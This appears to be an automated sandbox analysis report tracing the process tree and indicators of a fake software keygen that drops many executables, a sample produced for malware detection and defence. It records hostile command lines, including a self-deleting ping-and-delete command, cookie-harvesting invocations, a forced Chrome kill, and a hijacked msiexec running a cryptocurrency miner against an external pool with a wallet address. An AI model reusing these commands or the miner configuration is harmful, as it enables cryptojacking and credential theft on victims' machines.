86f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 5484 PING.EXE 4488 PING.EXE 1608 PING.EXE -
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 340 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 161 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 175 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 329 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 1116 setups.tmp 1116 setups.tmp 3948 multitimer.exe 3948 multitimer.exe 3948 multitimer.exe 3948 multitimer.exe 3948 multitimer.exe 3948 multitimer.exe 3948 multitimer.exe 3948 multitimer.exe 3948 multitimer.exe 3948 multitimer.exe 3948 multitimer.exe 3948 multitimer.exe 3948 multitimer.exe 3948 multitimer.exe 3948 multitimer.exe 3948 multitimer.exe 3948 multitimer.exe 3948 multitimer.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 1984 Setup.exe Token: SeCreateTokenPrivilege 1220 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 1220 askinstall20.exe Token: SeLockMemoryPrivilege 1220 askinstall20.exe Token: SeIncreaseQuotaPrivilege 1220 askinstall20.exe Token: SeMachineAccountPrivilege 1220 askinstall20.exe Token: SeTcbPrivilege 1220 askinstall20.exe Token: SeSecurityPrivilege 1220 askinstall20.exe Token: SeTakeOwnershipPrivilege 1220 askinstall20.exe Token: SeLoadDriverPrivilege 1220 askinstall20.exe Token: SeSystemProfilePrivilege 1220 askinstall20.exe Token: SeSystemtimePrivilege 1220 askinstall20.exe Token: SeProfSingleProcessPrivilege 1220 askinstall20.exe Token: SeIncBasePriorityPrivilege 1220 askinstall20.exe Token: SeCreatePagefilePrivilege 1220 askinstall20.exe Token: SeCreatePermanentPrivilege 1220 askinstall20.exe Token: SeBackupPrivilege 1220 askinstall20.exe Token: SeRestorePrivilege 1220 askinstall20.exe Token: SeShutdownPrivilege 1220 askinstall20.exe Token: SeDebugPrivilege 1220 askinstall20.exe Token: SeAuditPrivilege 1220 askinstall20.exe Token: SeSystemEnvironmentPrivilege 1220 askinstall20.exe Token: SeChangeNotifyPrivilege 1220 askinstall20.exe Token: SeRemoteShutdownPrivilege 1220 askinstall20.exe Token: SeUndockPrivilege 1220 askinstall20.exe Token: SeSyncAgentPrivilege 1220 askinstall20.exe Token: SeEnableDelegationPrivilege 1220 askinstall20.exe Token: SeManageVolumePrivilege 1220 askinstall20.exe Token: SeImpersonatePrivilege 1220 askinstall20.exe Token: SeCreateGlobalPrivilege 1220 askinstall20.exe Token: 31 1220 askinstall20.exe Token: 32 1220 askinstall20.exe Token: 33 1220 askinstall20.exe Token: 34 1220 askinstall20.exe Token: 35 1220 askinstall20.exe Token: SeDebugPrivilege 3948 multitimer.exe Token: SeDebugPrivilege 4120 taskkill.exe Token: SeDebugPrivilege 2584 MicrosoftEdge.exe Token: SeDebugPrivilege 2584 MicrosoftEdge.exe Token: SeDebugPrivilege 2584 MicrosoftEdge.exe Token: SeDebugPrivilege 2584 MicrosoftEdge.exe Token: SeDebugPrivilege 4496 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4496 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4496 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4496 MicrosoftEdgeCP.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 3560 setups.exe 1116 setups.tmp 2584 MicrosoftEdge.exe 4424 MicrosoftEdgeCP.exe 4424 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 3932 wrote to memory of 3956 3932 Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe 77 PID 3932 wrote to memory of 3956 3932 Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe 77 PID 3932 wrote to memory of 3956 3932 Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe 77 PID 3956 wrote to memory of 1004 3956 cmd.exe 80 PID 3956 wrote to memory of 1004 3956 cmd.exe 80 PID 3956 wrote to memory of 1004 3956 cmd.exe 80 PID 3956 wrote to memory of 1548 3956 cmd.exe 81 PID 3956 wrote to memory of 1548 3956 cmd.exe 81 PID 3956 wrote to memory of 1548 3956 cmd.exe 81 PID 3956 wrote to memory of 2464 3956 cmd.exe 82 PID 3956 wrote to memory of 2464 3956 cmd.exe 82 PID 3956 wrote to memory of 2464 3956 cmd.exe 82 PID 3956 wrote to memory of 1112 3956 cmd.exe 83 PID 3956 wrote to memory of 1112 3956 cmd.exe 83 PID 3956 wrote to memory of 1112 3956 cmd.exe 83 PID 1004 wrote to memory of 1100 1004 keygen-pr.exe 84 PID 1004 wrote to memory of 1100 1004 keygen-pr.exe 84 PID 1004 wrote to memory of 1100 1004 keygen-pr.exe 84 PID 1112 wrote to memory of 1984 1112 keygen-step-4.exe 85 PID 1112 wrote to memory of 1984 1112 keygen-step-4.exe 85 PID 2464 wrote to memory of 3216 2464 keygen-step-3.exe 86 PID 2464 wrote to memory of 3216 2464 keygen-step-3.exe 86 PID 2464 wrote to memory of 3216 2464 keygen-step-3.exe 86 PID 3216 wrote to memory of 1608 3216 cmd.exe 88 PID 3216 wrote to memory of 1608 3216 cmd.exe 88 PID 3216 wrote to memory of 1608 3216 cmd.exe 88 PID 1100 wrote to memory of 1588 1100 key.exe 89 PID 1100 wrote to memory of 1588 1100 key.exe 89 PID 1100 wrote to memory of 1588 1100 key.exe 89 PID 1984 wrote to memory of 3948 1984 Setup.exe 90 PID 1984 wrote to memory of 3948 1984 Setup.exe 90 PID 1984 wrote to memory of 3560 1984 Setup.exe 91 PID 1984 wrote to memory of 3560 1984 Setup.exe 91 PID 1984 wrote to memory of 3560 1984 Setup.exe 91 PID 1112 wrote to memory of 1220 1112 keygen-step-4.exe 92 PID 1112 wrote to memory of 1220 1112 keygen-step-4.exe 92 PID 1112 wrote to memory of 1220 1112 keygen-step-4.exe 92 PID 3560 wrote to memory of 1116 3560 setups.exe 93 PID 3560 wrote to memory of 1116 3560 setups.exe 93 PID 3560 wrote to memory of 1116 3560 setups.exe 93 PID 1220 wrote to memory of 2508 1220 askinstall20.exe 95 PID 1220 wrote to memory of 2508 1220 askinstall20.exe 95 PID 1220 wrote to memory of 2508 1220 askinstall20.exe 95 PID 2508 wrote to memory of 4120 2508 cmd.exe 98 PID 2508 wrote to memory of 4120 2508 cmd.exe 98 PID 2508 wrote to memory of 4120 2508 cmd.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe"C:\Users\Admin\AppData\Local\Temp\Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3956 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:1588
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:1548
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3216 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:1608
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Users\Admin\AppData\Local\Temp\XMUTJXSABT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\XMUTJXSABT\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3948 -
C:\Users\Admin\AppData\Local\Temp\XMUTJXSABT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\XMUTJXSABT\multitimer.exe" 1 3.1617537376.6069a960e8f23 1016⤵PID:4648
-
C:\Users\Admin\AppData\Local\Temp\XMUTJXSABT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\XMUTJXSABT\multitimer.exe" 2 3.1617537376.6069a960e8f237⤵PID:4800
-
C:\Users\Admin\AppData\Local\Temp\zw442mg44or\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\zw442mg44or\Setup3310.exe" /Verysilent /subid=5778⤵PID:3480
-
C:\Users\Admin\AppData\Local\Temp\is-OK4I7.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-OK4I7.tmp\Setup3310.tmp" /SL5="$501D4,138429,56832,C:\Users\Admin\AppData\Local\Temp\zw442mg44or\Setup3310.exe" /Verysilent /subid=5779⤵PID:4852
-
C:\Users\Admin\AppData\Local\Temp\is-H9G0K.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-H9G0K.tmp\Setup.exe" /Verysilent10⤵PID:5964
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"11⤵PID:5856
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:2240
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:4876
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"11⤵PID:5920
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 94812⤵
- Program crash
PID:3084
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 100812⤵
- Program crash
PID:6148
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 101612⤵
- Program crash
PID:5460
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 115612⤵
- Program crash
PID:6152
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 122812⤵
- Program crash
PID:6196
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 129212⤵
- Program crash
PID:6904
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 153212⤵
- Program crash
PID:6676
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 154012⤵
- Program crash
PID:6244
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 162412⤵
- Program crash
PID:3356
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 164012⤵
- Program crash
PID:6392
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 178412⤵
- Program crash
PID:4100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 149612⤵
- Program crash
PID:3172
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 180012⤵
- Program crash
PID:3472
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"11⤵PID:5476
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"11⤵PID:1544
-
C:\Users\Admin\AppData\Local\Temp\is-P2776.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-P2776.tmp\LabPicV3.tmp" /SL5="$203F4,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"12⤵PID:5928
-
C:\Users\Admin\AppData\Local\Temp\is-UD8P2.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-UD8P2.tmp\ppppppfy.exe" /S /UID=lab21413⤵PID:5644
-
C:\Program Files\Windows Mail\DKJJYHJDGK\prolab.exe"C:\Program Files\Windows Mail\DKJJYHJDGK\prolab.exe" /VERYSILENT14⤵PID:6064
-
C:\Users\Admin\AppData\Local\Temp\is-FGFVR.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-FGFVR.tmp\prolab.tmp" /SL5="$20198,575243,216576,C:\Program Files\Windows Mail\DKJJYHJDGK\prolab.exe" /VERYSILENT15⤵PID:2552
-
-
-
C:\Users\Admin\AppData\Local\Temp\b4-87a35-d5b-14b98-740e36dba200c\Xaequsaemado.exe"C:\Users\Admin\AppData\Local\Temp\b4-87a35-d5b-14b98-740e36dba200c\Xaequsaemado.exe"14⤵PID:4228
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 193615⤵PID:4880
-
-
-
C:\Users\Admin\AppData\Local\Temp\6e-888d4-f1e-321a4-9ac7ef6879db4\Dijufyneshe.exe"C:\Users\Admin\AppData\Local\Temp\6e-888d4-f1e-321a4-9ac7ef6879db4\Dijufyneshe.exe"14⤵PID:1768
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jcisihfu.cov\md6_6ydj.exe & exit15⤵PID:6504
-
C:\Users\Admin\AppData\Local\Temp\jcisihfu.cov\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\jcisihfu.cov\md6_6ydj.exe16⤵PID:6688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2idxm5dv.q3j\askinstall31.exe & exit15⤵PID:6308
-
C:\Users\Admin\AppData\Local\Temp\2idxm5dv.q3j\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\2idxm5dv.q3j\askinstall31.exe16⤵PID:3292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hbqsynkr.i43\toolspab1.exe & exit15⤵PID:3924
-
C:\Users\Admin\AppData\Local\Temp\hbqsynkr.i43\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\hbqsynkr.i43\toolspab1.exe16⤵PID:6008
-
C:\Users\Admin\AppData\Local\Temp\hbqsynkr.i43\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\hbqsynkr.i43\toolspab1.exe17⤵PID:6892
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bdjwreqh.ypn\GcleanerWW.exe /mixone & exit15⤵PID:4664
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0uy4yalo.3d0\setup_10.2_mix.exe & exit15⤵PID:8168
-
C:\Users\Admin\AppData\Local\Temp\0uy4yalo.3d0\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\0uy4yalo.3d0\setup_10.2_mix.exe16⤵PID:6664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ckkrjyrn.4z3\file.exe & exit15⤵PID:6360
-
C:\Users\Admin\AppData\Local\Temp\ckkrjyrn.4z3\file.exeC:\Users\Admin\AppData\Local\Temp\ckkrjyrn.4z3\file.exe16⤵PID:7956
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"17⤵PID:3580
-
C:\Users\Admin\AppData\Local\Temp\LNJYPUJ8SD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\LNJYPUJ8SD\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵PID:3376
-
C:\Users\Admin\AppData\Local\Temp\LNJYPUJ8SD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\LNJYPUJ8SD\multitimer.exe" 1 3.1617537641.6069aa691af24 10119⤵PID:3596
-
C:\Users\Admin\AppData\Local\Temp\LNJYPUJ8SD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\LNJYPUJ8SD\multitimer.exe" 2 3.1617537641.6069aa691af2420⤵PID:3132
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\S7SJ08SGF4\setups.exe"C:\Users\Admin\AppData\Local\Temp\S7SJ08SGF4\setups.exe" ll18⤵PID:7444
-
C:\Users\Admin\AppData\Local\Temp\is-8CHOA.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-8CHOA.tmp\setups.tmp" /SL5="$30554,454998,229376,C:\Users\Admin\AppData\Local\Temp\S7SJ08SGF4\setups.exe" ll19⤵PID:4400
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"17⤵PID:7236
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe"17⤵PID:7080
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"18⤵PID:6600
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install19⤵PID:7352
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"17⤵PID:5600
-
C:\Users\Admin\AppData\Roaming\A02A.tmp.exe"C:\Users\Admin\AppData\Roaming\A02A.tmp.exe"18⤵PID:8200
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999919⤵PID:8448
-
-
-
C:\Users\Admin\AppData\Roaming\AEA2.tmp.exe"C:\Users\Admin\AppData\Roaming\AEA2.tmp.exe"18⤵PID:7476
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\meal3zgh.sn2\app.exe /8-2222 & exit15⤵PID:7848
-
C:\Users\Admin\AppData\Local\Temp\meal3zgh.sn2\app.exeC:\Users\Admin\AppData\Local\Temp\meal3zgh.sn2\app.exe /8-222216⤵PID:6240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tymyclxx.s1t\Four.exe & exit15⤵PID:9140
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"11⤵PID:5376
-
C:\Users\Admin\AppData\Local\Temp\is-6KVIJ.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-6KVIJ.tmp\lylal220.tmp" /SL5="$203F6,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"12⤵PID:6016
-
C:\Users\Admin\AppData\Local\Temp\is-PS3FQ.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-PS3FQ.tmp\Microsoft.exe" /S /UID=lylal22013⤵PID:4508
-
C:\Program Files\Google\SMLGJFCQXY\irecord.exe"C:\Program Files\Google\SMLGJFCQXY\irecord.exe" /VERYSILENT14⤵PID:5520
-
C:\Users\Admin\AppData\Local\Temp\is-FP6EF.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-FP6EF.tmp\irecord.tmp" /SL5="$7015A,6265333,408064,C:\Program Files\Google\SMLGJFCQXY\irecord.exe" /VERYSILENT15⤵PID:5244
-
-
-
C:\Users\Admin\AppData\Local\Temp\a7-3fc65-2bc-58f98-e88278418de96\Kycaezhucyce.exe"C:\Users\Admin\AppData\Local\Temp\a7-3fc65-2bc-58f98-e88278418de96\Kycaezhucyce.exe"14⤵PID:5176
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oh0dczab.nw5\md6_6ydj.exe & exit15⤵PID:4688
-
C:\Users\Admin\AppData\Local\Temp\oh0dczab.nw5\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\oh0dczab.nw5\md6_6ydj.exe16⤵PID:6364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tihzuxl1.cnw\askinstall31.exe & exit15⤵PID:6312
-
C:\Users\Admin\AppData\Local\Temp\tihzuxl1.cnw\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\tihzuxl1.cnw\askinstall31.exe16⤵PID:6836
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵PID:2668
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
PID:5504
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hvc2kcgg.ksx\toolspab1.exe & exit15⤵PID:6656
-
C:\Users\Admin\AppData\Local\Temp\hvc2kcgg.ksx\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\hvc2kcgg.ksx\toolspab1.exe16⤵PID:3364
-
C:\Users\Admin\AppData\Local\Temp\hvc2kcgg.ksx\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\hvc2kcgg.ksx\toolspab1.exe17⤵PID:4996
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0rec1pan.2xc\GcleanerWW.exe /mixone & exit15⤵PID:7020
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oyk2r2cu.ybd\setup_10.2_mix.exe & exit15⤵PID:7512
-
C:\Users\Admin\AppData\Local\Temp\oyk2r2cu.ybd\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\oyk2r2cu.ybd\setup_10.2_mix.exe16⤵PID:7940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cbro2z4j.gav\file.exe & exit15⤵PID:7916
-
C:\Users\Admin\AppData\Local\Temp\cbro2z4j.gav\file.exeC:\Users\Admin\AppData\Local\Temp\cbro2z4j.gav\file.exe16⤵PID:7256
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"17⤵PID:7592
-
C:\Users\Admin\AppData\Local\Temp\15YOIZGK1P\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\15YOIZGK1P\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵PID:7744
-
C:\Users\Admin\AppData\Local\Temp\15YOIZGK1P\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\15YOIZGK1P\multitimer.exe" 1 3.1617537622.6069aa568bd2b 10119⤵PID:5068
-
C:\Users\Admin\AppData\Local\Temp\15YOIZGK1P\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\15YOIZGK1P\multitimer.exe" 2 3.1617537622.6069aa568bd2b20⤵PID:3088
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\A5IPTS9YR8\setups.exe"C:\Users\Admin\AppData\Local\Temp\A5IPTS9YR8\setups.exe" ll18⤵PID:7836
-
C:\Users\Admin\AppData\Local\Temp\is-AN5ML.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-AN5ML.tmp\setups.tmp" /SL5="$30436,454998,229376,C:\Users\Admin\AppData\Local\Temp\A5IPTS9YR8\setups.exe" ll19⤵PID:5684
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"17⤵PID:6400
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe18⤵PID:7092
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe19⤵
- Kills process with taskkill
PID:3996
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"17⤵PID:7948
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"18⤵PID:3144
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install19⤵PID:2976
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"17⤵PID:6652
-
C:\Users\Admin\AppData\Roaming\A54B.tmp.exe"C:\Users\Admin\AppData\Roaming\A54B.tmp.exe"18⤵PID:9124
-
-
C:\Users\Admin\AppData\Roaming\BA2B.tmp.exe"C:\Users\Admin\AppData\Roaming\BA2B.tmp.exe"18⤵PID:8364
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i5wleuuo.e5j\app.exe /8-2222 & exit15⤵PID:7788
-
C:\Users\Admin\AppData\Local\Temp\i5wleuuo.e5j\app.exeC:\Users\Admin\AppData\Local\Temp\i5wleuuo.e5j\app.exe /8-222216⤵PID:6852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1z1dptn2.sgq\Four.exe & exit15⤵PID:6832
-
C:\Users\Admin\AppData\Local\Temp\1z1dptn2.sgq\Four.exeC:\Users\Admin\AppData\Local\Temp\1z1dptn2.sgq\Four.exe16⤵PID:4244
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\53-66b18-864-861a1-93adc5dc3719c\Qomusaejizhi.exe"C:\Users\Admin\AppData\Local\Temp\53-66b18-864-861a1-93adc5dc3719c\Qomusaejizhi.exe"14⤵PID:3928
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 78815⤵PID:4700
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"11⤵PID:5908
-
